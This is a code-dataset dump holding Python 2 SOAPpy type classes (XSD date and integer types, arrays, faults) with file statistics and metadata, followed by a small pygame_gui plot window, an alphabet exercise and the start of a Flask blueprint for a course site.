_validURIs = (NS.XSD, NS.XSD2, NS.ENC)
class dateTimeType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.time()
if type(data) in (IntType, LongType):
data = list(time.gmtime(data)[:6])
elif isinstance(data, FloatType):
f = data - int(data)
data = list(time.gmtime(int(data))[:6])
data[5] += f
elif type(data) in (ListType, TupleType):
if len(data) < 6:
raise Exception("not enough values")
if len(data) > 9:
raise Exception("too many values")
data = list(data[:6])
cleanDate(data)
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04d-%02d-%02dT%02d:%02d:%02d" % ((abs(d[0]),) + d[1:])
if d[0] < 0:
s = '-' + s
f = d[5] - int(d[5])
if f != 0:
s += ("%g" % f)[1:]
s += 'Z'
self._cache = s
return self._cache
class recurringInstantType(anyType):
_validURIs = (NS.XSD,)
def _checkValueSpace(self, data):
try:
if data is None:
data = list(time.gmtime(time.time())[:6])
if (type(data) in (IntType, LongType)):
data = list(time.gmtime(data)[:6])
elif isinstance(data, FloatType):
f = data - int(data)
data = list(time.gmtime(int(data))[:6])
data[5] += f
elif type(data) in (ListType, TupleType):
if len(data) < 1:
raise Exception("not enough values")
if len(data) > 9:
raise Exception("too many values")
data = list(data[:6])
if len(data) < 6:
data += [0] * (6 - len(data))
f = len(data)
for i in range(f):
if data[i] is None:
if f < i:
raise Exception(
"only leftmost elements can be none")
else:
f = i
break
cleanDate(data, f)
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
e = list(d)
neg = ''
if not e[0]:
e[0] = '--'
else:
if e[0] < 0:
neg = '-'
e[0] = abs(e[0])
if e[0] < 100:
e[0] = '-' + "%02d" % e[0]
else:
e[0] = "%04d" % e[0]
for i in range(1, len(e)):
if e[i] is None or (i < 3 and e[i] == 0):
e[i] = '-'
else:
if e[i] < 0:
neg = '-'
e[i] = abs(e[i])
e[i] = "%02d" % e[i]
if d[5]:
f = abs(d[5] - int(d[5]))
if f:
e[5] += ("%g" % f)[1:]
s = "%s%s-%s-%sT%s:%s:%sZ" % ((neg,) + tuple(e))
self._cache = s
return self._cache
class timeInstantType(dateTimeType):
_validURIs = (NS.XSD, NS.XSD2, NS.ENC)
class timePeriodType(dateTimeType):
_validURIs = (NS.XSD2, NS.ENC)
class timeType(anyType):
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[3:6]
elif (type(data) == FloatType):
f = data - int(data)
data = list(time.gmtime(int(data))[3:6])
data[2] += f
elif type(data) in (IntType, LongType):
data = time.gmtime(data)[3:6]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[3:6]
elif len(data) > 3:
raise Exception("too many values")
data = [None, None, None] + list(data)
if len(data) < 6:
data += [0] * (6 - len(data))
cleanDate(data, 3)
data = data[3:]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
# s = ''
#
# s = time.strftime("%H:%M:%S", (0, 0, 0) + d + (0, 0, -1))
s = "%02d:%02d:%02d" % d
f = d[2] - int(d[2])
if f != 0:
s += ("%g" % f)[1:]
s += 'Z'
self._cache = s
return self._cache
class dateType(anyType):
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:3]
elif type(data) in (IntType, LongType,
FloatType):
data = time.gmtime(data)[0:3]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:3]
elif len(data) > 3:
raise Exception("too many values")
data = list(data)
if len(data) < 3:
data += [1, 1, 1][len(data):]
data += [0, 0, 0]
cleanDate(data)
data = data[:3]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04d-%02d-%02dZ" % ((abs(d[0]),) + d[1:])
if d[0] < 0:
s = '-' + s
self._cache = s
return self._cache
class gYearMonthType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:2]
elif type(data) in (IntType, LongType,
FloatType):
data = time.gmtime(data)[0:2]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:2]
elif len(data) > 2:
raise Exception("too many values")
data = list(data)
if len(data) < 2:
data += [1, 1][len(data):]
data += [1, 0, 0, 0]
cleanDate(data)
data = data[:2]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04d-%02dZ" % ((abs(d[0]),) + d[1:])
if d[0] < 0:
s = '-' + s
self._cache = s
return self._cache
class gYearType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:1]
elif type(data) in (IntType, LongType,
FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:1]
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%04dZ" % abs(d)
if d < 0:
s = '-' + s
self._cache = s
return self._cache
class centuryType(anyType):
_validURIs = (NS.XSD2, NS.ENC)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[0:1] / 100
elif type(data) in (IntType, LongType, FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:1] / 100
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
d = self._data
s = "%02dZ" % abs(d)
if d < 0:
s = '-' + s
self._cache = s
return self._cache
class yearType(gYearType):
_validURIs = (NS.XSD2, NS.ENC)
class gMonthDayType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[1:3]
elif type(data) in (IntType, LongType,
FloatType):
data = time.gmtime(data)[1:3]
elif type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[0:2]
elif len(data) > 2:
raise Exception("too many values")
data = list(data)
if len(data) < 2:
data += [1, 1][len(data):]
data = [0] + data + [0, 0, 0]
cleanDate(data, 1)
data = data[1:3]
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
self._cache = "--%02d-%02dZ" % self._data
return self._cache
class recurringDateType(gMonthDayType):
_validURIs = (NS.XSD2, NS.ENC)
class gMonthType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[1:2]
elif type(data) in (IntType, LongType,
FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[1:2]
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
if data[0] < 1 or data[0] > 12:
raise Exception("bad value")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
self._cache = "--%02d--Z" % self._data
return self._cache
class monthType(gMonthType):
_validURIs = (NS.XSD2, NS.ENC)
class gDayType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
try:
if data is None:
data = time.gmtime(time.time())[2:3]
elif type(data) in (IntType, LongType,
FloatType):
data = [data]
if type(data) in (ListType, TupleType):
if len(data) == 9:
data = data[2:3]
elif len(data) < 1:
raise Exception("too few values")
elif len(data) > 1:
raise Exception("too many values")
if isinstance(data[0], FloatType):
try:
s = int(data[0])
except Exception:
s = long(data[0])
if s != data[0]:
raise Exception("not integral")
data = [s]
elif type(data[0]) not in (IntType, LongType):
raise Exception("bad type")
if data[0] < 1 or data[0] > 31:
raise Exception("bad value")
else:
raise Exception("invalid type")
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return data[0]
def _marshalData(self):
if self._cache is None:
self._cache = "---%02dZ" % self._data
return self._cache
class recurringDayType(gDayType):
_validURIs = (NS.XSD2, NS.ENC)
class hexBinaryType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
if self._cache is None:
self._cache = encodeHexString(self._data)
return self._cache
class base64BinaryType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
if self._cache is None:
self._cache = base64.encodestring(self._data)
return self._cache
class base64Type(base64BinaryType):
_validURIs = (NS.ENC,)
class binaryType(anyType):
_validURIs = (NS.XSD, NS.ENC)
def __init__(self, data, name=None, typed=1,
encoding='base64', attrs=None):
anyType.__init__(self, data, name, typed, attrs)
self._setAttr('encoding', encoding)
def _marshalData(self):
if self._cache is None:
if self._getAttr((None, 'encoding')) == 'base64':
self._cache = base64.encodestring(self._data)
else:
self._cache = encodeHexString(self._data)
return self._cache
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _setAttr(self, attr, value):
attr = self._fixAttr(attr)
if attr[1] == 'encoding':
if attr[0] is not None or value not in ('base64', 'hex'):
raise AttributeError("invalid encoding")
self._cache = None
anyType._setAttr(self, attr, value)
class anyURIType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
if self._cache is None:
self._cache = urllib.quote(self._data)
return self._cache
class uriType(anyURIType):
_validURIs = (NS.XSD,)
class uriReferenceType(anyURIType):
_validURIs = (NS.XSD2,)
class NOTATIONType(anyType):
def __init__(self, data, name=None, typed=1, attrs=None):
if self.__class__ == NOTATIONType:
raise Error("a NOTATION can't be instantiated directly")
anyType.__init__(self, data, name, typed, attrs)
class ENTITIESType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) in (StringType, UnicodeType):
return (data,)
if type(data) not in (ListType, TupleType) or \
filter(lambda x: type(x) not in (StringType, UnicodeType), data):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
return ' '.join(self._data)
class IDREFSType(ENTITIESType):
pass
class NMTOKENSType(ENTITIESType):
pass
class integerType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType):
raise ValueError("invalid %s value" % self._type)
return data
class nonPositiveIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data > 0:
raise ValueError("invalid %s value" % self._type)
return data
class non_Positive_IntegerType(nonPositiveIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'non-positive-integer'
class negativeIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data >= 0:
raise ValueError("invalid %s value" % self._type)
return data
class negative_IntegerType(negativeIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'negative-integer'
class longType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -9223372036854775808L or \
data > 9223372036854775807L:
raise ValueError("invalid %s value" % self._type)
return data
class intType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -2147483648L or \
data > 2147483647L:
raise ValueError("invalid %s value" % self._type)
return data
class shortType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -32768 or \
data > 32767:
raise ValueError("invalid %s value" % self._type)
return data
class byteType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -128 or \
data > 127:
raise ValueError("invalid %s value" % self._type)
return data
class nonNegativeIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data < 0:
raise ValueError("invalid %s value" % self._type)
return data
class non_Negative_IntegerType(nonNegativeIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'non-negative-integer'
class unsignedLongType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 18446744073709551615L:
raise ValueError("invalid %s value" % self._type)
return data
class unsignedIntType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 4294967295L:
raise ValueError("invalid %s value" % self._type)
return data
class unsignedShortType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 65535:
raise ValueError("invalid %s value" % self._type)
return data
class unsignedByteType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 255:
raise ValueError("invalid %s value" % self._type)
return data
class positiveIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data <= 0:
raise ValueError("invalid %s value" % self._type)
return data
class positive_IntegerType(positiveIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'positive-integer'
# Now compound types
class compoundType(anyType):
def __init__(self, data=None, name=None, typed=1, attrs=None):
if self.__class__ == compoundType:
raise Error("a compound can't be instantiated directly")
anyType.__init__(self, data, name, typed, attrs)
self._keyord = []
if isinstance(data, DictType):
self.__dict__.update(data)
def _aslist(self, item=None):
if item is not None:
return self.__dict__[self._keyord[item]]
else:
return map(lambda x: self.__dict__[x], self._keyord)
def _asdict(self, item=None, encoding=Config.dict_encoding):
if item is not None:
if type(item) in (UnicodeType, StringType):
item = item.encode(encoding)
return self.__dict__[item]
else:
retval = {}
def fun(x): retval[x.encode(encoding)] = self.__dict__[x]
if hasattr(self, '_keyord'):
map(fun, self._keyord)
else:
for name in dir(self):
if isPublic(name):
retval[name] = getattr(self, name)
return retval
def __getitem__(self, item):
if isinstance(item, IntType):
return self.__dict__[self._keyord[item]]
else:
return getattr(self, item)
def __len__(self):
return len(self._keyord)
def __nonzero__(self):
return 1
def _keys(self):
return filter(lambda x: x[0] != '_', self.__dict__.keys())
def _addItem(self, name, value, attrs=None):
if name in self._keyord:
if not isinstance(self.__dict__[name], ListType):
self.__dict__[name] = [self.__dict__[name]]
self.__dict__[name].append(value)
else:
self.__dict__[name] = value
self._keyord.append(name)
def _placeItem(self, name, value, pos, subpos=0, attrs=None):
if subpos == 0 and not isinstance(self.__dict__[name], ListType):
self.__dict__[name] = value
else:
self.__dict__[name][subpos] = value
# only add to key order list if it does not already
# exist in list
if not (name in self._keyord):
if pos < len(self._keyord):
self._keyord[pos] = name
else:
self._keyord.append(name)
def _getItemAsList(self, name, default=[]):
try:
d = self.__dict__[name]
except Exception:
return default
if isinstance(d, ListType):
return d
return [d]
def __str__(self):
return anyType.__str__(self) + ": " + str(self._asdict())
def __repr__(self):
return self.__str__()
class structType(compoundType):
pass
class headerType(structType):
_validURIs = (NS.ENV,)
def __init__(self, data=None, typed=1, attrs=None):
structType.__init__(self, data, "Header", typed, attrs)
class bodyType(structType):
_validURIs = (NS.ENV,)
def __init__(self, data=None, typed=1, attrs=None):
structType.__init__(self, data, "Body", typed, attrs)
class arrayType(UserList.UserList, compoundType):
def __init__(self, data=None, name=None, attrs=None,
offset=0, rank=None, asize=0, elemsname=None):
if data:
if type(data) not in (ListType, TupleType):
raise Error("Data must be a sequence")
UserList.UserList.__init__(self, data)
compoundType.__init__(self, data, name, 0, attrs)
self._elemsname = elemsname or "item"
if data is None:
self._rank = rank
# According to 5.4.2.2 in the SOAP spec, each element in a
# sparse array must have a position. _posstate keeps track of
# whether we've seen a position or not. It's possible values
# are:
# -1 No elements have been added, so the state is indeterminate
# 0 An element without a position has been added, so no
# elements can have positions
# 1 An element with a position has been added, so all elements
# must have positions
self._posstate = -1
self._full = 0
if asize in ('', None):
asize = '0'
self._dims = map(lambda x: int(x), str(asize).split(','))
self._dims.reverse() # It's easier to work with this way
self._poss = [0] * len(self._dims) # This will end up
# reversed too
for i in range(len(self._dims)):
if self._dims[i] < 0 or \
self._dims[i] == 0 and len(self._dims) > 1:
raise TypeError("invalid Array dimensions")
if offset > 0:
self._poss[i] = offset % self._dims[i]
offset = int(offset / self._dims[i])
# Don't break out of the loop if offset is 0 so we test all the
# dimensions for > 0.
if offset:
raise AttributeError("invalid Array offset")
a = [None] * self._dims[0]
for i in range(1, len(self._dims)):
b = []
for j in range(self._dims[i]):
b.append(copy.deepcopy(a))
a = b
self.data = a
def _aslist(self, item=None):
if item is not None:
return self.data[int(item)]
else:
return self.data
def _asdict(self, item=None, encoding=Config.dict_encoding):
if item is not None:
if type(item) in (UnicodeType, StringType):
item = item.encode(encoding)
return self.data[int(item)]
else:
retval = {}
def fun(x): retval[str(x).encode(encoding)] = self.data[x]
map(fun, range(len(self.data)))
return retval
def __getitem__(self, item):
try:
return self.data[int(item)]
except ValueError:
return getattr(self, item)
def __len__(self):
return len(self.data)
def __nonzero__(self):
return 1
def __str__(self):
return anyType.__str__(self) + ": " + str(self._aslist())
def _keys(self):
return filter(lambda x: x[0] != '_', self.__dict__.keys())
def _addItem(self, name, value, attrs):
if self._full:
raise ValueError("Array is full")
pos = attrs.get((NS.ENC, 'position'))
if pos is not None:
if self._posstate == 0:
raise AttributeError(
"all elements in a sparse Array must have a "
"position attribute")
self._posstate = 1
try:
if pos[0] == '[' and pos[-1] == ']':
pos = map(lambda x: int(x), pos[1:-1].split(','))
pos.reverse()
if len(pos) == 1:
pos = pos[0]
curpos = [0] * len(self._dims)
for i in range(len(self._dims)):
curpos[i] = pos % self._dims[i]
pos = int(pos / self._dims[i])
if pos == 0:
break
if pos:
raise Exception
elif len(pos) != len(self._dims):
raise Exception
else:
for i in range(len(self._dims)):
if pos[i] >= self._dims[i]:
raise Exception
curpos = pos
else:
raise Exception
except Exception:
raise AttributeError(
"invalid Array element position %s" % str(pos))
else:
if self._posstate == 1:
raise AttributeError(
"only elements in a sparse Array may have a "
"position attribute")
self._posstate = 0
curpos = self._poss
a = self.data
for i in range(len(self._dims) - 1, 0, -1):
a = a[curpos[i]]
if curpos[0] >= len(a):
a += [None] * (len(a) - curpos[0] + 1)
a[curpos[0]] = value
if pos is None:
self._poss[0] += 1
for i in range(len(self._dims) - 1):
if self._poss[i] < self._dims[i]:
break
self._poss[i] = 0
self._poss[i + 1] += 1
if self._dims[-1] and self._poss[-1] >= self._dims[-1]:
# self._full = 1
            # FIXME: why is this occurring?
pass
def _placeItem(self, name, value, pos, subpos, attrs=None):
curpos = [0] * len(self._dims)
for i in range(len(self._dims)):
if self._dims[i] == 0:
curpos[0] = pos
break
curpos[i] = pos % self._dims[i]
pos = int(pos / self._dims[i])
if pos == 0:
break
if self._dims[i] != 0 and pos:
raise Error("array index out of range")
a = self.data
for i in range(len(self._dims) - 1, 0, -1):
a = a[curpos[i]]
if curpos[0] >= len(a):
a += [None] * (len(a) - curpos[0] + 1)
a[curpos[0]] = value
class mapType(arrayType):
_validURIs = ('http://xml.apache.org/xml-soap',)
def __init__(self, data=None, name=None, attrs=None,
offset=0, rank=None, asize=0, elemsname=None):
arrayType.__init__(self, data, name, attrs, offset, rank, asize,
elemsname)
self._keyord = ['key', 'value']
class typedArrayType(arrayType):
def __init__(self, data=None, name=None, typed=None, attrs=None,
offset=0, rank=None, asize=0, elemsname=None, complexType=0):
arrayType.__init__(self, data, name, attrs, offset, rank, asize,
elemsname)
self._typed = 1
self._type = typed
self._complexType = complexType
class faultType(structType, Error):
def __init__(self, faultcode="", faultstring="", detail=None):
self.faultcode = faultcode
self.faultstring = faultstring
if detail is not None:
self.detail = detail
structType.__init__(self, None, 0)
def _setDetail(self, detail=None):
if detail is not None:
self.detail = detail
else:
try:
del self.detail
except AttributeError:
pass
def __repr__(self):
if getattr(self, 'detail', None) is not None:
return "<Fault %s: %s: %s>" % (self.faultcode,
self.faultstring,
self.detail)
else:
return "<Fault %s: %s>" % (self.faultcode, self.faultstring)
__str__ = __repr__
def __call__(self):
return (self.faultcode, self.faultstring, self.detail)
class SOAPException(Exception):
def __init__(self, code="", string="", detail=None):
self.value = ("SOAPpy SOAP Exception", code, string, detail)
self.code = code
self.string = string
self.detail = detail
def __str__(self):
return repr(self.value)
class RequiredHeaderMismatch(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MethodNotFound(Exception):
def __init__(self, value):
(val, detail) = value.split(":")
self.value = val
self.detail = detail
def __str__(self):
return repr(self.value, self.detail)
class AuthorizationFailed(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MethodFailed(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
#######
# Convert complex SOAPpy objects to native python equivalents
#######
def simplify(object, level=0):
"""
Convert the SOAPpy objects and their contents to simple python types.
This function recursively converts the passed 'container' object,
and all public subobjects. (Private subobjects have names that
start with '_'.)
Conversions:
- faultType --> raise python exception
- arrayType --> array
- compoundType --> dictionary
"""
if level > 10:
return object
if isinstance(object, faultType):
if object.faultstring == "Required Header Misunderstood":
raise RequiredHeaderMismatch(object.detail)
elif object.faultstring == "Method Not Found":
raise MethodNotFound(object.detail)
elif object.faultstring == "Authorization Failed":
raise AuthorizationFailed(object.detail)
elif object.faultstring == "Method Failed":
raise MethodFailed(object.detail)
else:
se = SOAPException(object.faultcode, object.faultstring,
object.detail)
raise se
elif isinstance(object, arrayType):
data = object._aslist()
for k in range(len(data)):
data[k] = simplify(data[k], level=level+1)
return data
elif isinstance(object, compoundType) or isinstance(object, structType):
data = object._asdict()
for k in data.keys():
if isPublic(k):
data[k] = simplify(data[k], level=level+1)
return data
elif type(object) == DictType:
for k in object.keys():
if isPublic(k):
object[k] = simplify(object[k])
return object
elif type(object) == list:
for k in range(len(object)):
object[k] = simplify(object[k])
return object
else:
return object
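# A rough sketch of how simplify() might be used on a SOAPpy call result
# (hypothetical server proxy and method; exact contents depend on the service):
#
#   result = server.getUserList()   # arrayType / structType objects
#   plain = simplify(result)        # nested lists and dicts of basic Python types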
def simplify_contents(object, level=0):
"""
Convert the contents of SOAPpy objects to simple python types.
This function recursively converts the sub-objects contained in a
'container' object to simple python types.
Conversions:
- faultType --> raise python exception
- arrayType --> array
- compoundType --> dictionary
"""
if level > 10:
return object
if isinstance(object, faultType):
for k in object._keys():
if isPublic(k):
setattr(object, k, simplify(object[k], level=level+1))
raise object
elif isinstance(object, arrayType):
data = object._aslist()
for k in range(len(data)):
object[k] = simplify(data[k], level=level+1)
elif isinstance(object, structType):
data = object._asdict()
for k in data.keys():
if isPublic(k):
setattr(object, k, simplify(data[k], level=level+1))
elif isinstance(object, compoundType):
data = object._asdict()
for k in data.keys():
if isPublic(k):
object[k] = simplify(data[k], level=level+1)
elif isinstance(object, DictType):
for k in object.keys():
if isPublic(k):
object[k] = simplify(object[k])
elif type(object) == list:
for k in range(len(object)):
object[k] = simplify(object[k])
return object
| 28.400533
| 80
| 0.520009
| 46,931
| 0.881317
| 0
| 0
| 0
| 0
| 0
| 0
| 7,835
| 0.147133
|
af4465eb1740d25f4243ab38dfe29940e3f43d6f
| 1,508
|
py
|
Python
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 3
|
2021-12-13T17:56:15.000Z
|
2022-03-03T21:00:24.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 1
|
2021-11-28T12:02:52.000Z
|
2021-12-21T09:04:41.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | null | null | null |
"""Contain a window with a plot for pygame_gui."""
from typing import Union
import pygame
import pygame_gui
from pygame_gui.core.interfaces.manager_interface import IUIManagerInterface
from pygame_gui.core.ui_element import ObjectID
from .backend_pygame import FigureSurface
import matplotlib
matplotlib.use("module://pygame_matplotlib.backend_pygame")
class UIPlotWindow(pygame_gui.elements.ui_window.UIWindow):
def __init__(
self,
rect: pygame.Rect,
manager: IUIManagerInterface,
figuresurface: FigureSurface,
window_display_title: str = "",
element_id: Union[str, None] = None,
object_id: Union[ObjectID, str, None] = None,
resizable: bool = False,
visible: int = 1,
):
self.figuresurf = figuresurface
super().__init__(
rect,
manager,
window_display_title=window_display_title,
element_id=element_id,
object_id=object_id,
resizable=resizable,
visible=visible,
)
def set_dimensions(self, *args, **kwargs):
super().set_dimensions(*args, **kwargs)
print("setting dimensions")
# Update the size of the figure with the new bounding rectangle
self.figuresurf.set_bounding_rect(self.get_container().get_rect())
self.update_window_image()
def update_window_image(self):
# Update the image of the container
self.get_container().set_image(self.figuresurf)
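# A minimal usage sketch (assumptions: a running pygame display, a pygame_gui
# UIManager, and that plt.subplots() yields a FigureSurface under this backend;
# variable names are illustrative):
#
#   import pygame, pygame_gui
#   import matplotlib.pyplot as plt
#
#   fig, ax = plt.subplots()
#   ax.plot([1, 2, 3], [2, 1, 3])
#   manager = pygame_gui.UIManager((800, 600))
#   window = UIPlotWindow(pygame.Rect(40, 40, 420, 320), manager, fig,
#                         window_display_title="Plot", resizable=True)
#   window.update_window_image()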
| 31.416667
| 76
| 0.670424
| 1,149
| 0.761936
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.141247
|
af44d9ce71d347bfea046cddeb10613e1ff52421
| 67
|
py
|
Python
|
jetbrains-academy/Numeric Matrix Processor/Problems/Alphabet/task.py
|
robinpatra/ML-Study-3
|
6f401706a8da4cac5e63304ce09ff6ff62756d0b
|
[
"MIT"
] | null | null | null |
jetbrains-academy/Numeric Matrix Processor/Problems/Alphabet/task.py
|
robinpatra/ML-Study-3
|
6f401706a8da4cac5e63304ce09ff6ff62756d0b
|
[
"MIT"
] | null | null | null |
jetbrains-academy/Numeric Matrix Processor/Problems/Alphabet/task.py
|
robinpatra/ML-Study-3
|
6f401706a8da4cac5e63304ce09ff6ff62756d0b
|
[
"MIT"
] | null | null | null |
# work with this string
alphabet = input()
print(tuple(alphabet))
| 13.4
| 23
| 0.731343
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.343284
|
af454b0c2f018d2a6fb480e99014829738475907
| 955
|
py
|
Python
|
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint,render_template,flash,url_for,redirect
from simpledu.models import Course, User
from simpledu.forms import LoginForm,RegisterForm
from flask_login import login_user
front = Blueprint('front',__name__)
@front.route('/')
def index():
courses = Course.query.all()
return render_template('index.html',courses=courses)
@front.route('/login', methods=['GET', 'POST'])
def login():
